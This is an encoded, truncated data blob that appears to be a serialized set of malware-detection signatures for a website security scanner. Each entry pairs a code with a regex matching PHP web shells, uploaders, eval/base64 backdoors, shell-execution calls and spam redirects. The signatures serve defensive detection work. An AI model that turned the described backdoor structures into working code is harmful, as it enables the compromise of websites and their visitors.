kW2EtelxfMC=5XStbXHQgPV=rIlthLXpcX1wtXFwwLTldKiI7W1xyXG4gXHRdKikrKChcJFthLXpcXzAtOV=rW1x=ID1dKyk_XCRbYS16XF8wLTldK1woKy4rP1tcKV=rO1tcclxuIFx=XSopKy4rcmV=dXJuWyBcdF=rbmV3WyBcdF=rUmVjdXJzaXZlQXJyYXlJdGVyYXRvcltcKCBcdF=rYXJyYXkuKz9bXCkgXHRdKztbXH1dKy9pcyI7fXM6NzY6ImRpc3BsYXlfZXJyb3JzIGZpbGVfZ2V=X2NvbnRlbnRzIF9SRVFVRVNUIGZpbGVuYW1lIHVwZGF=ZV9jb2RlIGZ3cml=ZSB1bmxpbmsiO2E6Mjp7aTowO3M6NToiRzhNSjQiO2k6MTtzOjE1MzoiL14uKz8oZXJyb3JfcmVwb3J=aW5nXCgwXCl8ZGlzcGxheV9lcnJvcnMpLis_KGZpbGVfZ2V=X2NvbnRlbnRzXChbXjtdKnx1cmxkZWNvZGVcKClcJF8oUE98UkVRVUUpU1RcW1siJ11mW2lsZV=qbmFtZVtzXT9bIiddXF=uKz9md3JpdGVcKC4rP3VubGlua1woLiskL2lzIjt9czo1MToiZGlzcGxheV9lcnJvcnMgY3JlYXRlX3dwX3VzZXIgUkVRVUVTVCBmd3JpdGUgdW5saW5rIjthOjI6e2k6MDtzOjU6IkUyRjliIjtpOjE7czo3OToiL14uKz9kaXNwbGF5X2Vycm9ycy4rP2NyZWF=ZV93cF91c2VyXChcJF9SRVFVRVNUXFsuKz9md3JpdGVcKC4rP3VubGlua1woLis_JC9pcyI7fXM6MTc6InBocCBjbGFzcyB2aWFXb3JtIjthOjI6e2k6MDtzOjU6IkY3NEVlIjtpOjE7czoyNTI6Ii88XD9bcGhcc1=rKFwvXCouKj9cKlwvXHMqKSooY2xhc3MgdmlhV29ybVxzKlx7Lis_ZndyaXRlXCguKz9maWxlX2dldF9jb25=ZW5=c1woLis_dW5saW5rXCguKz9iYXNlNjRfZW5jb2RlXCguKz8pP2ZpbGVfcHV=X2NvbnRlbnRzXChbXixdKyxccypiYXNlNjRfZGVjb2RlXCgoXEA_ZmlsZV9nZXRfY29udGVudHNcKC4rfFteXCldK1tcKTtcc1=rZWNob1tcc1woXStmaWxlX2dldF9jb25=ZW5=c1woW15cKV=rW1wpO1xzXSsoJHxcPz4pKS9pcyI7fXM6NDI6ImlmIGlzc2V=IFJFUVVFU1QgRklMRSBzdHJpcHNsYXNoZXMgUkVRVUVTVCI7YToyOntpOjA7czo1OiJHNjhDMyI7aToxO3M6MjgyOiIvaWZbXHNcKF=raXNzZXRbXHNcKF=rXCRfKEdFfFBPU3xSRVFVRVMpVChccypcW1teXF1dKlxdK3xccypce1teXH1dKlx9KykrW1xzXClce1=rKChcJFthLXpfMC=5XSspXHMqPVxzKlwkXyhHRXxQT1N8UkVRVUVTKVQoXHMqXFtbXlxdXSpcXSt8XHMqXHtbXlx9XSpcfSspK1teO1=qWztcc1=qKSooYXNzZXJ=fGV2YWx8XCRbYS16XzAtOV=rKVxzKlwoK3N=cmlwc2xhc2hlc1woXCRfKEdFfFBPU3xSRVFVRVMpVChccypcW1teXF1dKlxdK3xccypce1teXH1dKlx9KykrW1xzXCldKztbXH1cc1=qL2kiO31zOjgxOiJlcnJvcl9yZXBvcnRpbmcgZXZhbCBjdXJsX2luaXQgZmlsZV9nZXRfY29udGVudHMgZmlsZV9wdXRfY29udGVudHMgaW5jbHVkZSB1bmxpbmsiO2E6Mjp7aTowO3M6NToiRTVFRFoiO2k6MTtzOjIwMToiL1wkW2EtelxfMC=5XStbPVxzXStfX=ZJTEVfXztccypcJFthLXpcXzAtOV=rW1xzPV1bXjtdezIwMDB9Lio_ZXJyb3JfcmVwb3J=aW5nXCguKz9ldmFsXCguKz8oY3VybF9pbml=fGZpbGVfZ2V=X2NvbnRlbnRzKS4rP2ZpbGVfcHV=X2NvbnRlbnRzXCguKz9pbmNsdWRlLio_dW5saW5rXCguKj9cKTtccypcfVxzKmVsc2Vccypce1teXH1dK1tcfV=rL2lzIjt9czo2MDoicGF=aCBpZiBmaWxlX2V4aXN=cyBpc193cml=YWJsZSBpZiBmdW5jdGlvbl9leGlzdHMgV3JpdGVEYXRhIjthOjI6e2k6MDtzOjU6IkU1RkN2IjtpOjE7czoxMzk6Ii9cJHBhdGhbPVxzXSsuK1tcc1=qaWZbXHNdKlwoXCFmaWxlX2V4aXN=c1woLis_aXNfd3JpdGFibGVcKFteXCldKltcKVxzXHtdK2lmW1xzXSpcKGZ1bmN=aW9uX2V4aXN=c1woLis_V3JpdGVEYXRhLis_V3JpdGVEYXRhXChcKTtbXHNcfV=rL2kiO31zOjUyOiJhdXRoX3Bhc3MgY29weSBGSUxFUyBleGVjIHBhc3N=aHJ1IHN5c3RlbSBzaGVsbF9leGVjIjthOjI6e2k6MDtzOjU6IkY=REgxIjtpOjE7czoxMjE6Ii88XD8oPz=uKlwkKG1kNXxhdXRoKV9wYXNzXHMqPSkoPz=uKmNvcHlcKFwkXyhQT1NUfEZJTEVTKVxbKSg_PS4qZXhlY1woKSg_PS4qcGFzc3RocnUpKD89LipzeXN=ZW=pKD89LipzaGVsbF9leGVjXCgpLisvaXMiO31zOjE=MDoiZXJyb3JfcmVwb3J=aW5nIGZ1bmN=aW9uIGVycm9yXzQwNCB=dHBfcmVxdWVzdF9jdXN=b2=gZ2V=SXAgZ2V=VXNlcmFnZW5=IGNvbnZlcnRJcFRvU3RyaW5nIGh=dHBfYnVpbGRfcXVlcnkgZmlsZV9nZXRfY29udGVudHMgZndyaXRlIGxvbmcyaXAiO2E6Mjp7aTowO3M6NToiRjdWOWgiO2k6MTtzOjIxMjoiLzxcPy4rP2Vycm9yX3JlcG9ydGluZ1woKD89Lis_Z2V=W19dKklwXCgpKD89Lis_ZnVuY3Rpb24gZXJyb3JfNDA=XCgpKCg_PS4rP3N=cmVhbV9jb25=ZXh=X2NyZWF=ZVwoKXwoPz=uKz9yZXF1ZXN=X2N1c3RvbVwoKSkoPz=uKz9odHRwX2J1aWxkX3F1ZXJ5XCgpKD89Lis_ZmlsZV9nZXRfY29udGVudHNcKCkoPz=uKz9oZWFkZXJcKCkoPz=uKz9sb25nMmlwXCgpLisvaXMiO31zOjQ1OiJpZiBmdW5jdGlvbl9leGlzdHMgZnVuY3Rpb24gdmFyaWFibGUgZnVuY3Rpb24iO2E6Mjp7aTowO3M6NToiSDlTN=kiO2k6MTtzOjQzODoiLyhcL1wqW15cKl=qKFwqW15cKlwvXSopK1wvXHMqKSooXCRbYS16XzAtOV=rKFxzKlxbW15cXV=rXF=rKSpbXC5cc1=qPVteO1=rO1xzKikoKGlmW1woXHNcIV=rZnVuY3Rpb25fZXhpc3RzW1woXHNdK1snIl1bXlx7XStce1xzKik_ZnVuY3Rpb25ccyooXCRbYS16XzAtOV=rKVxzKlwoLis_cmV=dXJuLio_O1tcc1x9XSspPygoXCRbYS16XzAtOV=rKVxzKj1ccyooY3JlYXRlX2Z1bmN=aW9uXHMqXChbXixdKyxccyp8XDdcKFxzKikoW1wkYS16XzAtOV=rKVteO1=rWzsnIlwpXH1cc1=rKSsoXHMqKFwkW2Etel8wLTldK1xzKj1ccyopP1wkW2Etel8wLTldK1woW147XStbIidcKTtcfVxzXSspKygoaWZbXChcc1whXStmdW5jdGlvbl9leGlzdHNbXChcc1=rWyciXVteXHtdK1x7XHMqKT9mdW5jdGlvblxzKihcMTF8XDkpXHMqXCguKj9yZXR1cm4uKj87W1xzXH1dKyk_L2lzIjt9czo=NjoicGVybCB1c2UgSU86OlNvY2tldCBzY2FuX2RpciB1bmFtZSBzeXN=ZW=gZXhlYyI7YToyOntpOjA7czo1OiJFOFM3ZSI7aToxO3M6NzQ6Ii9cI1whXC91c3JcL2JpblwvcGVybC4rP3NjYW5fZGlyXCguKz91bmFtZVwoLis_c3lzdGVtXCguKz9maWxlbWFuYWdlci4rL2lzIjt9czo2MToiZnVuY3Rpb24gWF9pcCBYX21hY3JvcyBlcnJvcl8=MDQgaHR=cF9yZXF1ZXN=IGZ3cml=ZSBGVU5DVElPTiI7YToyOntpOjA7czo1OiJFOUg5NSI7aToxO3M6MTE2OiIvXDxcPy4rP19pcFwoKC4rP2Z1bmN=aW9uIFthLXowLTldK19tYWNyb3NcKCl7NH=uKz9mdW5jdGlvbiBlcnJvcl8=MDRcKC4rP2h=dHBfcmVxdWVzdC4rP2Z3cml=ZVwoLis_X19GVU5DVElPTl9fLisvcyI7fXM6ODc6ImluaV9zZXQgb2Jfc3RhcnQgcmVnaXN=ZXJfc2h1dGRvd25fZnVuY3Rpb24gaWYgSFRUUF9VU=VSX=FHRU5UIGZpbGVfZ2V=X2NvbnRlbnRzIHJldHVybiI7YToyOntpOjA7czo1OiJGNUs3aiI7aToxO3M6Mjc2OiIvXEA_aW5pX3NldFwoLitccysoXEA_b2Jfc3RhcnRcKFsiJ1=oLis_KVsnIl1cKTtccytcQD9yZWdpc3Rlcl9zaHV=ZG93bl9mdW5jdGlvblwoLitccysoZnVuY3Rpb24gXDJcKFwkW2EtelxfMC=5XStbXClcc1x7XStpZi4rP=hUVFBfVVNFUl9BR=VOVC4rW1wpXHNce1=rLis_ZmlsZV9nZXRfY29udGVudHMuK1xzKnJldHVyblteO1=qO1tcc1x9XSspP3woXCRbYS16XF8wLTldKylccyo9XHMqYmFzZTY=X2RlY29kZVwoLitccyplY2hvLis_ZmlsZV9nZXRfY29udGVudHNcKFw=LispL2kiO31zOjM4OiJpZiBDT=9LSUUgZ3ppbmZsYXRlIGJhc2U2NF9kZWNvZGUgZXZhbCI7YToyOntpOjA7czo1OiJGNExEOCI7aToxO3M6MjQ3OiIvaWZccypcKC4rP1woXCRfQ=9PS=lFLis_W1x7XHNdKihcJFthLXpfMC=5XSspXHMqPS4qP2Jhc2U2NF9kZWNvZGVcKCguKz9ldmFsXChcMVwpLit8W147XStbO1xzXSsoXCRbYS16XzAtOV=rKVxzKj1bXjtdK1s7XHNdKyhmaWxlX3B1dF9jb25=ZW5=c1woXDMuKz9cMVteO1=rWztcc1=rfGVjaG9bXChcc1=rWyciXVxceC4rP1snIl1bXCk7XHNdKyhpbmNsdWRlfHVubGluaylbXChcc1=rXDNbXCk7XHNdKyl7Myx9LispW1xzXH1dKi9pIjt9czoyMToiaWYgaXNzZXQgUkVRVUVTVCBldmFsIjthOjI6e2k6MDtzOjU6IkcxSDhSIjtpOjE7czoyNzI6Ii8oKFwkW19hLXowLTldK1xzKj1bXjtdKztccyopKmlmW1xzXChdK2lzc2V=W1woXHNdK1wkXyhSRVFVRVN8R=V8UE9TKVRcW1teXF1dK1xdW1wpXHNdK1x7XHMqKFwkW19cLmEtejAtOV=rWz1cc1=rXCRfKFJFUVVFU3xHRXxQT1MpVFxbW15cXV=rXF1bO1xzXSspKygoXCRbX2EtejAtOV=rWz1cc1=rKT8oZXZhbHxmaWxlX3B1dF9jb25=ZW5=c3xmb3Blbnxmd3JpdGV8ZmNsb3NlKVwoW15cKV=rXCk7XHMqKSsoKGVjaG98ZXhpdClbXlw7XSo7XHMqKSpcfVxzKihlbHNlKT8pKy9pIjt9czozNToiaWYgaXNzZXQgYmFzZTY=X2RlY29kZSBSRVFVRVNUIGV2YWwiO2E6Mjp7aTowO3M6NToiRjRTRFYiO2k6MTtzOjMwODoiLzxcP1twaFxzXSsoKFxAPyhpZ25vcmVfdXNlcl9hYm9ydHxzZXRfdGltZV9saW1pdClcKHxcJFtfXC5hLXowLTldK1xzKj=pW147XStbO1xzXSspKmlmW1woXHNcIV=rKGlzc2V=fGVtcHR5KVtcKFxzXStcJF8oUkVRVUVTfEdFfFBPUylUXFsuK1tcc1x7XSsoXCRbX1wuYS16MC=5XSspXHMqPVxzKihiYXNlNjRfZGVjb2RlfFwkW2Etel8wLTldKylccypcKCtccypcJF8oUkVRVUVTfEdFfFBPUylUXFtbXlxdXStcXVtcKTtcc1=rXEA_ZXZhbFwoXDZcKTtccypcfShccyplbHNlW1xzXHtdK2VjaG8gIlteIl=qWyI7XHNcfV=rKT8oJHxcPz4pL2kiO31zOjU2OiJzZXRfdGltZV9saW1pdCB1bmxpbmsgYmFzZTY=X2RlY29kZSBmd3JpdGUgZXhlYyBwYXNzdGhydSI7YToyOntpOjA7czo1OiJFOVA3MyI7aToxO3M6OTk6Ii88XD8ocGhwKT8uKz9zZXRfdGltZV9saW1pdFwoMFwpLis_dW5saW5rXCguKz9iYXNlNjRfZGVjb2RlXCguKz9md3JpdGVcKC4rP2V4ZWNcKC4rP3Bhc3N=aHJ1XCguKy9pcyI7fXM6MzQ6Im1vdmVfdXBsb2FkZWRfZmlsZSBfRklMRVMgX19GSUxFX18iO2E6Mjp7aTowO3M6NToiSDE4R2YiO2k6MTtzOjI2MDoiLzxcP1twaFxzXSsoKFwkW2Etel8wLTldKylccyo9XHMqXCRfRklMRVNcW1teO1=rO1xzKihcJFthLXpfMC=5XSspXHMqPVteO1=rO1xzKmlmW1xzXChdK2ZpbGVfZXhpc3RzW1xzXCgnIlwuXC9dK1wzW1xzXCgnIlwpXHNdK3VubGlua1tcc1woJyJcLlwvKV=rXDMpPy4qPyhtb3ZlX3VwbG9hZGVkX2ZpbGVbXHNcKF=rKFwkX=ZJTEVTXFtbXixdK1ssXHNdK19fRklMRV9ffFwyKXxzeXN=ZW1cKFsnIl1tdiBbJyJdXC5cJF9GSUxFU1xbKS4qPygkfFw_PikvaXMiO31zOjQ4OiJwaHAgYXJyYXkgZm9yZWFjaCBhcnJheSBldmFsIEFycmF5IEZ1bmN=aW9uIFBPU1QiO2E6Mjp7aTowO3M6NToiRUFVTnAiO2k6MTtzOjEyMToiLzxcP1twaF=qXHMrKFwkW2EtelwtXF8wLTldKylbPVxzXSthcnJheVwoW147XSs7XHMqZm9yZWFjaFtcc1woXStcMS4rP2V2YWxbXHNcKF=rXDFcW1teXF1dK1xdK1tcKFxzXStcJF9QT1NUXFtcMS4rP1w_Pi9pcyI7fXM6Nzc6ImZ3cml=ZSB1bmxpbmsgZXZhbCBjaG1vZCBQT1NUIHBocGluZm8gbW92ZV91cGxvYWRlZF9maWxlIGV4ZWMgc3lzdGVtIHBhc3N=aHJ1IjthOjI6e2k6MDtzOjU6IkVCN=V=IjtpOjE7czoxNTM6Ii88XD8uKz9lcnJvcl9yZXBvcnRpbmdcKDBcKS4rP2Z3cml=ZVwoLis_dW5saW5rXCguKz9ldmFsXCguKz9jaG1vZFwoXCRfUE9TVFxbLis_cGhwaW5mb1woLis_bW92ZV91cGxvYWRlZF9maWxlXCgoLis_KGV4ZWNcKHxzeXN=ZW1cKHxwYXNzdGhydVwoKSl7M3=uKy9pcyI7fXM6Mjk6InBvc3Qgc3RydG91cHBlciBpZiBpc3NldCBldmFsIjthOjI6e2k6MDtzOjU6IkZCM=JlIjtpOjE7czoxODc6Ii8oKFwkW2Etel8wLTldKylccyo9W147XSs7XHMqKSsoXCRbX2EtejAtOV=rXHMqPVxzKihcJFthLXpfMC=5XSt8c3RydG8uLi5lcilccypcKChbXHNcLl=qXCRbYS16XzAtOV=rXHMqXFtcZCtcXSkrW1wpO1xzXSspK2lmW1woXHNdK2lzc2V=XHMqXChbXlwpXStbXClcc1=rXHtccypldmFsXHMqXChbXlwpXStbXCk7XHNdK1x9L2kiO31zOjY1OiJpZiBhcnJheV9rZXlzIEdFVCBmaWxlX2dldF9jb25=ZW5=cyBpZiB1bmxpbmsgZm9wZW4gZndyaXRlIGZjbG9zZSI7YToyOntpOjA7czo1OiJHNkJDMCI7aToxO3M6MjkzOiIvKFxAPyhpZ25vcmVfdXNlcl9hYm9ydHxpbmlfc2V=fHNldF9=aW1lX2xpbWl=fGVycm9yX3JlcG9ydGluZylcKC4qP1wpO1xzKnxcJFthLXpfMC=5XStccyo9W147XSs7XHMqKSooKChpZlxzKlwofGVsc2UpW15ce1=qXHtccyopP2Z1bmN=aW9uXHMrLis_cmV=dXJuW147XSo7W1xzXH1dKykrKChcJFthLXpfMC=5XStccyo9XHMqKT9cJFthLXpfMC=5XStcKFteO1=rWyInXCk7XH1cc1=qKSsuKz8oZihvcGVufHdyaXRlfGNsb3NlKVwoLis_KXszLH1pbmNsdWRlXCguKj9cKTtccyp1bmxpbmtcKC4qP1wpO1xzKi9pcyI7fXM6NDE6ImlmIGFycmF5X2tleXMgR=VUIGV2YWwgYmFzZTY=X2RlY29kZSBleGl=IjthOjI6e2k6MDtzOjU6IkVDRkZGIjtpOjE7czoyMTk6Ii88XD9bcGhcc1=qKFxAP2Vycm9yX3JlcG9ydGluZ1woMFwpO1xzKik_aWZbXChcc1=rYXJyYXlfa2V5c1woXCRfR=VULitccysoKDxcP1twaFxzXSopP1wkW2EtelxfMC=5XStbXHNce1wkXStcQD9ldmFsXChiYXNlNjRfZGVjb2RlXChbJyJdW2EtelxfXC9cK1w9MC=5XStbJyJdW1wpXH1ce1wkXHNdK2V4aXRcKFtcKVx9XHNdK1wmXHMqXCRbYS16XF8wLTldK1s7XHNcfV=rXD8-KSsvaSI7fXM6Mzk6ImJhc2U2NF9kZWNvZGUgZnVuY3Rpb24gY3VybCByZXR1cm4gZXhpdCI7YToyOntpOjA7czo1OiJFQ=ZKViI7aToxO3M6MTk4OiIvPFw_W3BoXHNdKihcL1wqLis_XCpcL1xzKikqKFwkW2EtelxfMC=5XStccyo9XHMqYmFzZTY=X2RlY29kZVwoW147XStbXCk7XHNdKikrZnVuY3Rpb25ccysoW2EtelxfMC=5XSspXHMqXChbXlx7XStbXHtcc1=rKChcJFthLXpcXzAtOV=rW1xzKj1dKyk_Y3VybF9bXjtdKztccyopK3JldHVybiAuK1wzXCguK2V4aXQ7W1x9XHNdKygkfFw_PikvaXMiO31zOjUxOiJpZiBpc3NldCBGSUxFU3xSRVFVRVNUIG1vdmVfdXBsb2FkZWRfZmlsZSBlbHNlIGVjaG8iO2E6Mjp7aTowO3M6NToiRjJSQmwiO2k6MTtzOjUwOToiLzxcP1twaFxzXSsoKFwkW2EtelxfMC=5XStccyo9fHNldF9=aW1lX2xpbWl=XCh8aW5pX3NldFwoKVteO1=rWztcc1=rKSooKFthLXpcXzAtOV=rKVwoW147XStbO1xzXH1dKyk_KGlmW1woXHNdK3N1YnN=cltcKFxzXStbXlx7XStbXHNce1=rKFwkW2EtelxfMC=5XStccyo9W147XStbO1xzXH1dKykrKT8oaWZbXChcc1=rKGlzc2V=W1woXHNdKyk_XCRfKEZJTEVTfFJFUVVFU1R8UE9TVHxHRVQpW15cKV=qW1wpXHNce1=rKFwkW2Etel8wLTldK1xzKj1bXjtdKztccyopKikrKFxAfGlmW1woXHNdKykqbW92ZV91cGxvYWRlZF9maWxlXChbXjtdKyhbO1xzXH1dKyhlbHNlW1x7XHNdK3woZWNob3xleGl=KVteO1=qWztcc1x9XSspKikrKGZ1bmN=aW9uXHMrXDRcKFteO1=rWztcc1x9XSsoXCRbYS16XF8wLTldK1xzKj1bXjtdK1s7XHNcfV=rKSppZltcKFxzXStbXlx7XStbXHNce1=rKFxAfGlmW1woXHNdKykqbWtkaXJcKFteO1=rWztcc1x9XStyZXR1cm5bXjtdK1s7XHNcfV=rKT8oXD8-fCQpL2kiO31zOjUzOiJleGVjIHN5c3RlbSBwYXNzdGhydSBmd3JpdGUgVmFyaWFibGUgRnVuY3Rpb24gUkVRVUVTVCI7YToyOntpOjA7czo1OiJGN1BNUiI7aToxO3M6MjE2OiIvPFw_W3BoXHNdKygoXCRbYS16XzAtOV=rKVxzKj1ccyooW2Etel8wLTldK1woXHMqKVwkXyhSRVFVRVN8R=V8UE9TKVRcWy4qKHBhc3N=aHJ1fGV4ZWN8c3lzdGVtfFwkW2Etel8wLTldKylcKFtccyJdKlwyfC4rP2V4ZWNcKC4rP3N5c3RlbVwoLis_cGFzc3RocnVcKC4rP2Z3cml=ZVwoLis_XEA_XCRbYS16XzAtOV=rXChcJF8oUkVRVUVTfEdFfFBPUylUKS4rPygkfFw_PikvaXMiO31zOjU1OiJwaHAgVmFycyBBcnJheSBiYXNlNjRfZGVjb2RlIGZ1bmN=aW9uIFZhcmlhYmxlIEZ1bmN=aW9uIjthOjI6e2k6MDtzOjU6Ikc1RDZTIjtpOjE7czoyNzU6Ii8oXCRbYS16XzAtOV=rXHMqPVteO1=rWztcc1=rKSooXCRbXCRce1=qW2Etel8wLTldK1x9KihccypcW1teXF1dK1xdfFxzKlx7W15cfV=rXH=pKilccyo9XHMqYXJyYXlbXChcc1=rYmFzZTY=X2RlY29kZVwoLis_ZnVuY3Rpb24gKFthLXpfMC=5XSspXHMqXCguKz9cMlxzKihcW1teXF1dK1xdXHMqKSpcKC4rKFwkW1wkXHtdKlthLXpfMC=5XStcfSooXHMqXFtbXlxdXStcXXxccypce1teXH1dK1x9KSopXHMqPVw=XCguKz8oZWNob3xkaWV8cHJpbnQpW1xzXChdKlw2W147XSo7L2lzIjt9czozNjoiaWYgcmVuYW1lIG9yIGZpbGVfcHV=X2NvbnRlbnRzIHRvdWNoIjthOjI6e2k6MDtzOjU6IkYyTkU2IjtpOjE7czo5MToiLzxcPy4rP2NvcHlcKF9fRklMRV9fLC4rP2ZpbGVfcHV=X2NvbnRlbnRzXCguKz91bmxpbmtcKC4rP2hlYWRlclwoIkxvY2F=aW9uOiBodHRwOlwvXC8uKy9pcyI7fXM6MzM6Imh=bWwgaGVhZCB1bnppcCBGSUxFUyB1bmxpbmsgZm9ybSI7YToyOntpOjA7czo1OiJHMlFDQiI7aToxO3M6MjMwOiIvXjxodG1sPlxzKjxoZWFkPi4rPyhmaWxlcGVybXNccypcKC4rPyhwb3NpeF9nZXRbcHd1Z3JdK2lkXHMqXCguKz8pezIsfW1vdmVfdXBsb2FkZWRfZmlsZVxzKlwoLis_ZnB1dHNccypcKC4rP3VubGlua1xzKlwoLis_ZXhlY1xzKlwoLis_XHMqcmVhZGRpclwoLis_XD98dW56aXBcKFwkX=ZJTEVTXFsuKz91bmxpbmtcKFwkLitcPz5ccyo8XC9mb3JtKT5ccyo8XC9ib2R5PlxzKjxcL2h=bWw-XHMqJC9pcyI7fXM6ODk6ImN1cmxfaW5pdCBoZWFkZXIgTG9jYXRpb24gcmV=dXJuIHByZWdfcmVwbGFjZV9jYWxsYmFjayBjcmVhdGVfZnVuY3Rpb24gcmV=dXJuIFJFTU9URV9BRERSIjthOjI6e2k6MDtzOjU6IkVDVDJlIjtpOjE7czoxNDY6Ii88XD8uKz9jdXJsX2luaXRcKC4rP2hlYWRlcltcKCInXHNdK=xvY2F=aW9uOi4rP3JldHVybiBwcmVnX3JlcGxhY2VfY2FsbGJhY2tcKC4rP2NyZWF=ZV9mdW5jdGlvblwoLis_cmV=dXJuIFwkX1NFUlZFUlxbWyInXVJFTU9URV9BRERSLisoXD8-fCQpL2lzIjt9czo4MToicGhwIGJhc2U2NF9kZWNvZGUgZmlsZV9wdXRfY29udGVudHMgdW5saW5rIGZ1bmN=aW9uX2V4aXN=cyBIZXggY2FsbF91c2VyX2Z1bmMgSGV4IjthOjI6e2k6MDtzOjU6IkYxNjBxIjtpOjE7czozNTY6Ii88XD9bcGhcc1=rKFwkXHtbXlx9XStbXH1cc1=rKFxbW15cXV=rW1xdXHNcfV=rKSo9W147XStbO1xzXSsoXEA_KFwkW2Etel8wLTldK1xzKj18ZGVmaW5lXCh8c2Vzc2lvbl9zdGFydFwofGVycm9yX3JlcG9ydGluZ1wofGluaV9zZXRcKHxzZXRfdGltZV9saW1pdFwofHNldF9tYWdpY19xdW9=ZXNfcnVudGltZVwoKVteO1=rWztcc1=rfGlmXChbXlx7XStbXHtcc1=rW15cfV=rW1x9XHNdKykqKSsoW147XStbO1xzXSspPy4rZmlsZV9wdXRfY29udGVudHNcKC4rP2Jhc2U2NF9kZWNvZGVcKC4rP3VubGlua1woLis_ZnVuY3Rpb25fZXhpc3RzXChbJyJdXFx4Lis_Y2FsbF91c2VyX2Z1bmNcKFsnIl1cXHguKz8oJHxcPz4pL2lzIjt9czo1NToiaHRtbCBib2R5IHBocCBvcGVuZGlyIHJlYWRkaXIgIWZpbGVfZXhpc3RzIGZvcGVuIGZ3cml=ZSI7YToyOntpOjA7czo1OiJGMkRKViI7aToxO3M6MjIxOiIvKDwoXCF8XC8pPyhkb2N=eXBlfGh=bWx8aGVhZHxtZXRhfHRpdGxlfGJvZHkpW14-XSo-W2Etel8wLTlcc1=qKXsyLH=8XD9bcGhcc1=rXCRbYS16XF8wLTldK1xzKj1ccyonPFw_W3BoXHNdKy4rP29wZW5kaXJcKC4rP3JlYWRkaXJcKC4rPyhcIWZpbGVfZXhpc3RzXCguKz9mb3BlblwoLis_ZndyaXRlXCguKz8pezMsfVw_PlxzKig8XC8oaHRtbHxib2R5KVtePl=qPlxzKil7Mix9JC9pcyI7fXM6Njg6InBocCBmdW5jdGlvbiBkaWUgc2V=Y29va2llIGlmIGVtcHR5IGlmIGlzc2V=IGZvcm=gbW92ZV91cGxvYWRlZF9maWxlIjthOjI6e2k6MDtzOjU6Ikc5Mkp3IjtpOjE7czo2MDE6Ii88XD9bcGhcc1=rKChcJFthLXpfMC=5XSspXHMqPVteO1=rO1xzKikqKGlmW1woXHNdKyhcMnxcIWVtcHR5W1woXHNdKylbXlx7XStce1xzKigoKChcJFthLXpfMC=5XSspXHMqPVxzKik_KFwyXCguKj9cKSt8XCRfKFJFUVVFU3xHRXxQT1MpVFteO1=rKTtccyp8aWZbXChcc1whXSsoaXNzZXRbXChcc1=rLis_XCkrXHMrW2Etel8wLTldK3xcOFteXH1dKikpKStbXH1cc1=qfGZ1bmN=aW9uIFthLXpfMC=5XStcKFteXHtdK1x7XHMqKGRpZVwoLis_XCk7XHMqfChcJF9DT=9LSUUuKz87XHMqfHNldGNvb2tpZVwoLis_XCk7XHMqKXsyfSlcfVxzKikrKFtcc1x7XSooXCRbYS16XzAtOV=rKVxzKj1ccypcJF8oUkVRVUVTVHxHRVR8UE9TVHxGSUxFKVteO1=rO1tcc1x9XSopKihcPz5ccyp8ZWNob1tcc1woXSooWyciXSkpKDwoZm9ybXxpbnB1dClbXj5dKj5bYS16XDowLTlcc1=qKSs8XC9mb3JtPihccyo8XD9bcGhcc1=rfFsnIl=7XHMqKShcJFthLXpfMC=5XStccyo9W147XSs7XHMqfGlmW1xzXChdKykqKG1vdmVfdXBsb2FkZWRfZmlsZVwoW15cO1=rfChcJFthLXpfMC=5XSspXHMqPVxzKlwkW2Etel8wLTldK1xzKlwoLio_XCkpO1tcc1x9XSooJHxcPz4pL2kiO31zOjEyOToicGhwIHNldF9=aW1lX2xpbWl=IGluaV9zZXQgZXJyb3JfcmVwb3J=aW5nIGlmIGFycmF5X2tleV9leGlzdHMgSFRUUF9VU=VSX=FHRU5UIHNlYXJjaC1=cmFja2VyLmNvbSBwcmVnX21hdGNoIGdvb2dsZSBiaW5nIG9iX3N=YXJ=IjthOjI6e2k6MDtzOjU6IkYzSktoIjtpOjE7czoyMzA6Ii88XD9bcGhcc1=rLio_c2V=X3RpbWVfbGltaXRcKC4rP2luaV9zZXRcKC4rP2Vycm9yX3JlcG9ydGluZ1woLis_aWZbXChcIVxzXSthcnJheV9rZXlfZXhpc3RzXChbIiddSFRUUF9VU=VSX=FHRU5ULis_aHR=cDpcL1wvc2VhcmNoLXRyYWNrZXJcLmNvbVwvaW5cLmNnaVw_Lis_KHByZWdfbWF=Y2hcKFsiJ11cLyhbXlwvXSpnb29nbGV8W15cL1=qYmluZyl7Mn=uKz8pezJ9Lis_b2Jfc3RhcnRcKC4rL2lzIjt9czo3MjoiYmFzZTY=X2RlY29kZSBmaWxlX3B1dF9jb25=ZW5=cyBjaG1vZCB=b3VjaCBmc29ja29wZW4gY3VybF9leGVjIG9iX3N=YXJ=IjthOjI6e2k6MDtzOjU6IkZCR=JZIjtpOjE7czoxOTU6Ii9cL1wvXHMqaXN=YXJ=Lis_KFwkW2Etel8wLTldKylbXHMqXC49XStiYXNlNjRfZGVjb2RlXCguKz9maWxlX3B1dF9jb25=ZW5=c1woW14sXSssXHMqXDEuKz9jaG1vZFwoLis_dG91Y2hcKC4rPyhmc29ja29wZW5cKC4rP2ZnZXRzXCh8Y3VybF9pbml=XCguKz9jdXJsX2V4ZWNcKCkuKz9vYl9zdGFydFwoLis_XC9cL2llbmRbXlxuXD9dKi9pcyI7fXM6NjY6InBocCBpZiBmdW5jdGlvbl9leGlzdHMgZmlsZV9wdXRfY29udGVudHMgZm9wZW4gY2htb2Qgc3lzdGVtIHVubGluayI7YToyOntpOjA7czo1OiJGQk5LTyI7aToxO3M6MTY5OiIvPFw_KC4rPyh=b3VjaHxoZWFkZXIpXCgpKy4rP2lmW1xzXChcIV=rZnVuY3Rpb25fZXhpc3RzXChbXHMnIl=rKGZpbGVfcHV=X2NvbnRlbnRzKVsiJ1xzXClce1=rZnVuY3Rpb25ccytcM1woLis_Zm9wZW5cKC4rP1wzXCguKz9jaG1vZFwoLis_c3lzdGVtXCguKyh1bmxpbmt8ZXhpdClcKC4rL2lzIjt9czoyNjoicGhwIGVjaG8gcGFzc3RocnUgX1JFUVVFU1QiO2E6Mjp7aTowO3M6NToiRkJOS=IiO2k6MTtzOjE1NjoiLzxcP1twaFxzXSsoKGVjaG98cHJpbnQpW1xzXChdKyhbJyJdKS4qP1wzW1wpXHNdKjtccyopKigoXCRbYS16XzAtOV=rKVxzKj1ccyopP1xAPyhwYXNzdGhydXxleGVjfHN5c3RlbXxcJFthLXpfMC=5XSspXHMqXChcJF8oUkVRVUVTfEdFfFBPUylULis7XHMqKCR8XD8-KS9pIjt9czo2OToicmVxdWlyZV9vbmNlIHdwLWNvbmZpZyBpbmlfc2V=IG15c3FsX3F1ZXJ5IFVQREFURSB1c2VycyBTRVQgdXNlcl9wYXNzIjthO